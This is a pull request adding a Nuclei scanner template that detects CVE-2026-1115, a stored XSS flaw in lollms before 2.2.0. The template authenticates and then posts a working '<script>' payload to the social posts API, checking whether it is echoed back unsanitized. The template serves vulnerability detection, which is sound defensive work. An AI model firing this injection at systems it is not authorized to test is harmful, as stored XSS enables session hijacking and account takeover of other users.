### PR TITLE
Add CVE-2026-1115 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-1115.yaml
+++ b/http/cves/2026/CVE-2026-1115.yaml
@@ -1,0 +1,73 @@
+id: CVE-2026-1115
+
+info:
+  name: parisneo/lollms < 2.2.0 - Stored XSS in Social Post Creation
+  author: str4k3r
+  severity: high
+  description: |
+    The `create_post` handler in `backend/routers/social/__init__.py` of
+    lollms assigns the authenticated caller's `content` field directly to
+    the `DBPost` model with no sanitization, and returns the stored value
+    verbatim in the creation response. Any authenticated user (any
+    registration/privilege tier) can inject and persist arbitrary
+    JavaScript that is later rendered unescaped in the browsers of every
+    user viewing the Home Feed, including administrators, enabling stored
+    XSS, session hijacking, and account takeover. Fixed in 2.2.0 (commit
+    9767b882dbc893c388a286856beeaead69b8292a), which runs post content
+    through a bleach-based `sanitize_content()` allowlist before storing
+    it. This template authenticates with the operator-supplied
+    credentials, submits a post containing a `<script>` payload, and
+    confirms the raw tag is echoed back unsanitized in the API response.
+  reference:
+    - https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a
+    - https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa
+  classification:
+    cve-id: CVE-2026-1115
+    cwe-id: CWE-79
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
+    cvss-score: 9.6
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: parisneo
+    product: lollms
+  tags: cve,cve2026,lollms,ai,xss,stored,authenticated
+
+variables:
+  username: ""
+  password: ""
+
+http:
+  - raw:
+      - |
+        POST /api/auth/token HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{url_encode(username)}}&password={{url_encode(password)}}
+
+      - |
+        POST /api/social/posts HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Bearer {{access_token}}
+        Content-Type: application/json
+
+        {"content":"<script>alert(document.cookie)</script>CVE2026_1115_{{randstr}}","visibility":"public","media":[]}
+
+    extractors:
+      - type: json
+        name: access_token
+        part: body
+        internal: true
+        json:
+          - '.access_token'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 201
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.cookie)</script>"


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-1115. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.